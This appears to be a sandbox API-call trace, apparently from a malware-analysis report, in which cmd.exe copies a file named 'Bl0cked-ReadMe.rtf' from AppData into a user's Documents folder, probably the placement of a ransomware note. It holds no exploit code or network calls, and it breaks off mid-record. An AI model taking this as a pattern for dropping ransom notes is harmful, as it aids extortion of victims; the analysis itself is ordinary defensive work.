filename = "" Thread: id = 167 os_tid = 0xa80 [0131.754] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cfacc | out: lpSystemTimeAsFileTime=0x2cfacc*(dwLowDateTime=0x8877d380, dwHighDateTime=0x1d440a9)) [0131.754] GetCurrentProcessId () returned 0x968 [0131.754] GetCurrentThreadId () returned 0xa80 [0131.754] GetTickCount () returned 0x29f98 [0131.754] QueryPerformanceCounter (in: lpPerformanceCount=0x2cfac4 | out: lpPerformanceCount=0x2cfac4*=18854357858) returned 1 [0131.755] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0131.755] __set_app_type (_Type=0x1) [0131.755] __p__fmode () returned 0x76b331f4 [0131.755] __p__commode () returned 0x76b331fc [0131.755] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0131.755] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0131.755] GetCurrentThreadId () returned 0xa80 [0131.756] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa80) returned 0x38 [0131.756] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0131.756] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0131.756] SetThreadUILanguage (LangId=0x0) returned 0x409 [0131.756] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0131.756] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cfa5c | out: phkResult=0x2cfa5c*=0x0) returned 0x2 [0131.756] VirtualQuery (in: lpAddress=0x2cfa93, lpBuffer=0x2cfa2c, dwLength=0x1c | out: lpBuffer=0x2cfa2c*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0131.756] VirtualQuery (in: lpAddress=0x1d0000, 
lpBuffer=0x2cfa2c, dwLength=0x1c | out: lpBuffer=0x2cfa2c*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0131.756] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cfa2c, dwLength=0x1c | out: lpBuffer=0x2cfa2c*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0131.756] VirtualQuery (in: lpAddress=0x1d3000, lpBuffer=0x2cfa2c, dwLength=0x1c | out: lpBuffer=0x2cfa2c*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0131.756] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cfa2c, dwLength=0x1c | out: lpBuffer=0x2cfa2c*(BaseAddress=0x2d0000, AllocationBase=0x2d0000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0131.756] GetConsoleOutputCP () returned 0x1b5 [0131.756] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0131.757] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0131.757] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.757] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0131.757] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.757] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0131.757] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.757] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0131.757] _get_osfhandle (_FileHandle=0) returned 0x3 [0131.757] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0131.758] _get_osfhandle (_FileHandle=0) returned 0x3 [0131.758] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0131.758] GetEnvironmentStringsW () returned 0x400198* [0131.758] FreeEnvironmentStringsW 
(penv=0x400198) returned 1 [0131.758] GetEnvironmentStringsW () returned 0x400198* [0131.758] FreeEnvironmentStringsW (penv=0x400198) returned 1 [0131.758] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce9cc | out: phkResult=0x2ce9cc*=0x40) returned 0x0 [0131.758] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce9d4, lpData=0x2ce9d8, lpcbData=0x2ce9d0*=0x1000 | out: lpType=0x2ce9d4*=0x0, lpData=0x2ce9d8*=0xc0, lpcbData=0x2ce9d0*=0x1000) returned 0x2 [0131.758] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce9d4, lpData=0x2ce9d8, lpcbData=0x2ce9d0*=0x1000 | out: lpType=0x2ce9d4*=0x4, lpData=0x2ce9d8*=0x1, lpcbData=0x2ce9d0*=0x4) returned 0x0 [0131.758] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce9d4, lpData=0x2ce9d8, lpcbData=0x2ce9d0*=0x1000 | out: lpType=0x2ce9d4*=0x0, lpData=0x2ce9d8*=0x1, lpcbData=0x2ce9d0*=0x1000) returned 0x2 [0131.758] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce9d4, lpData=0x2ce9d8, lpcbData=0x2ce9d0*=0x1000 | out: lpType=0x2ce9d4*=0x4, lpData=0x2ce9d8*=0x0, lpcbData=0x2ce9d0*=0x4) returned 0x0 [0131.758] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce9d4, lpData=0x2ce9d8, lpcbData=0x2ce9d0*=0x1000 | out: lpType=0x2ce9d4*=0x4, lpData=0x2ce9d8*=0x40, lpcbData=0x2ce9d0*=0x4) returned 0x0 [0131.758] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce9d4, lpData=0x2ce9d8, lpcbData=0x2ce9d0*=0x1000 | out: lpType=0x2ce9d4*=0x4, lpData=0x2ce9d8*=0x40, lpcbData=0x2ce9d0*=0x4) returned 0x0 [0131.758] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce9d4, lpData=0x2ce9d8, lpcbData=0x2ce9d0*=0x1000 | out: lpType=0x2ce9d4*=0x0, lpData=0x2ce9d8*=0x40, 
lpcbData=0x2ce9d0*=0x1000) returned 0x2 [0131.758] RegCloseKey (hKey=0x40) returned 0x0 [0131.758] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce9cc | out: phkResult=0x2ce9cc*=0x40) returned 0x0 [0131.758] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce9d4, lpData=0x2ce9d8, lpcbData=0x2ce9d0*=0x1000 | out: lpType=0x2ce9d4*=0x0, lpData=0x2ce9d8*=0x40, lpcbData=0x2ce9d0*=0x1000) returned 0x2 [0131.758] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce9d4, lpData=0x2ce9d8, lpcbData=0x2ce9d0*=0x1000 | out: lpType=0x2ce9d4*=0x4, lpData=0x2ce9d8*=0x1, lpcbData=0x2ce9d0*=0x4) returned 0x0 [0131.759] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce9d4, lpData=0x2ce9d8, lpcbData=0x2ce9d0*=0x1000 | out: lpType=0x2ce9d4*=0x0, lpData=0x2ce9d8*=0x1, lpcbData=0x2ce9d0*=0x1000) returned 0x2 [0131.759] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce9d4, lpData=0x2ce9d8, lpcbData=0x2ce9d0*=0x1000 | out: lpType=0x2ce9d4*=0x4, lpData=0x2ce9d8*=0x0, lpcbData=0x2ce9d0*=0x4) returned 0x0 [0131.759] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce9d4, lpData=0x2ce9d8, lpcbData=0x2ce9d0*=0x1000 | out: lpType=0x2ce9d4*=0x4, lpData=0x2ce9d8*=0x9, lpcbData=0x2ce9d0*=0x4) returned 0x0 [0131.759] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce9d4, lpData=0x2ce9d8, lpcbData=0x2ce9d0*=0x1000 | out: lpType=0x2ce9d4*=0x4, lpData=0x2ce9d8*=0x9, lpcbData=0x2ce9d0*=0x4) returned 0x0 [0131.759] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce9d4, lpData=0x2ce9d8, lpcbData=0x2ce9d0*=0x1000 | out: lpType=0x2ce9d4*=0x0, lpData=0x2ce9d8*=0x9, lpcbData=0x2ce9d0*=0x1000) returned 0x2 [0131.759] RegCloseKey (hKey=0x40) 
returned 0x0 [0131.759] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886366 [0131.759] srand (_Seed=0x5b886366) [0131.759] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Bl0cked-ReadMe.rtf\"" [0131.759] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Bl0cked-ReadMe.rtf\"" [0131.759] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0131.759] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4018f8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0131.759] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0131.759] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0131.759] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0131.759] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0131.759] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0131.759] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0131.759] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0131.760] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0131.760] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0131.760] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0131.760] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 
[0131.760] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0131.760] GetEnvironmentStringsW () returned 0x4022e8* [0131.760] FreeEnvironmentStringsW (penv=0x4022e8) returned 1 [0131.760] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.760] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0131.760] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0131.760] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0131.760] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0131.760] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0131.760] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0131.760] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0131.760] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0131.760] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0131.760] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cf798 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0131.760] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2cf798, lpFilePart=0x2cf794 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2cf794*="Desktop") returned 0x18 [0131.760] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0131.760] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf514 | out: lpFindFileData=0x2cf514) returned 0x400028 [0131.760] FindClose (in: hFindFile=0x400028 | out: hFindFile=0x400028) returned 1 [0131.761] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2cf514 | out: lpFindFileData=0x2cf514) returned 0x400028 [0131.761] FindClose (in: hFindFile=0x400028 | out: hFindFile=0x400028) returned 1 [0131.761] FindFirstFileW 
(in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2cf514 | out: lpFindFileData=0x2cf514) returned 0x400028 [0131.761] FindClose (in: hFindFile=0x400028 | out: hFindFile=0x400028) returned 1 [0131.761] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0131.761] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0131.761] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0131.761] GetEnvironmentStringsW () returned 0x402b08* [0131.761] FreeEnvironmentStringsW (penv=0x402b08) returned 1 [0131.761] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0131.762] GetConsoleOutputCP () returned 0x1b5 [0131.762] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0131.762] GetUserDefaultLCID () returned 0x409 [0131.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0131.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cf8d8, cchData=128 | out: lpLCData="0") returned 2 [0131.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cf8d8, cchData=128 | out: lpLCData="0") returned 2 [0131.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cf8d8, cchData=128 | out: lpLCData="1") returned 2 [0131.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0131.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0131.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0131.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 
[0131.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0131.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0131.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0131.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0131.762] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0131.762] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0131.762] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0131.763] GetConsoleTitleW (in: lpConsoleTitle=0x3f08f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.763] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0131.763] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0131.763] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0131.764] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0131.764] _wcsicmp (_String1="type", _String2=")") returned 75 [0131.764] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0131.764] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0131.764] _wcsicmp (_String1="IF", _String2="type") returned -11 [0131.764] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0131.764] _wcsicmp (_String1="REM", _String2="type") returned -2 [0131.764] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0131.768] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.768] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.768] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.768] GetFileType 
(hFile=0x7) returned 0x2 [0131.768] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0131.769] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cf7d0 | out: lpMode=0x2cf7d0) returned 1 [0131.769] _dup (_FileHandle=1) returned 3 [0131.769] _close (_FileHandle=1) returned 0 [0131.769] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0131.769] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x2cf7a0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0131.770] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0131.770] GetConsoleTitleW (in: lpConsoleTitle=0x2cf5d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.770] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0131.770] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0131.770] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0131.771] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0131.771] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0131.771] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x2cf134, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cf134) returned 0x3f0e90 [0131.771] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0131.771] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0131.772] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0131.772] CreateFileW 
(lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2ce040, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0131.772] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0131.772] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.772] GetFileType (hFile=0x54) returned 0x1 [0131.772] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.772] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x2ce098 | out: lpFileSizeHigh=0x2ce098*=0x0) returned 0x1632 [0131.772] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.772] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.772] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.772] ReadFile (in: hFile=0x54, lpBuffer=0x2ceed0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce0c0, lpOverlapped=0x0 | out: lpBuffer=0x2ceed0*, lpNumberOfBytesRead=0x2ce0c0*=0x200, lpOverlapped=0x0) returned 1 [0131.772] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.772] GetFileType (hFile=0x4c) returned 0x1 [0131.772] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.772] GetFileType (hFile=0x4c) returned 0x1 [0131.772] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.772] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceed0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2ceed0*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.773] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.773] GetFileType (hFile=0x4c) returned 0x1 [0131.773] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.773] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cef20*, 
lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.773] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.773] GetFileType (hFile=0x4c) returned 0x1 [0131.773] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.773] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cef70*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.774] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.774] GetFileType (hFile=0x4c) returned 0x1 [0131.774] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.774] WriteFile (in: hFile=0x4c, lpBuffer=0x2cefc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cefc0*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.774] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.774] GetFileType (hFile=0x4c) returned 0x1 [0131.774] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.774] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf010*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf010*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.774] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.774] GetFileType (hFile=0x4c) returned 0x1 [0131.774] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.774] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf060*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.774] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.774] GetFileType (hFile=0x4c) returned 0x1 [0131.774] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.774] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0b0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b0*, lpNumberOfBytesWritten=0x2ce0b4*=0x20, 
lpOverlapped=0x0) returned 1 [0131.774] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.774] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce0a0 | out: lpNewFilePointer=0x0) returned 1 [0131.774] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.774] ReadFile (in: hFile=0x54, lpBuffer=0x2ceed0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce0c0, lpOverlapped=0x0 | out: lpBuffer=0x2ceed0*, lpNumberOfBytesRead=0x2ce0c0*=0x200, lpOverlapped=0x0) returned 1 [0131.774] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.774] GetFileType (hFile=0x4c) returned 0x1 [0131.775] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.775] GetFileType (hFile=0x4c) returned 0x1 [0131.775] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.775] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceed0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2ceed0*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.775] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.775] GetFileType (hFile=0x4c) returned 0x1 [0131.775] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.775] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cef20*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.775] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.775] GetFileType (hFile=0x4c) returned 0x1 [0131.775] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.775] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cef70*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.775] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.775] GetFileType (hFile=0x4c) returned 0x1 [0131.775] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.775] WriteFile (in: hFile=0x4c, 
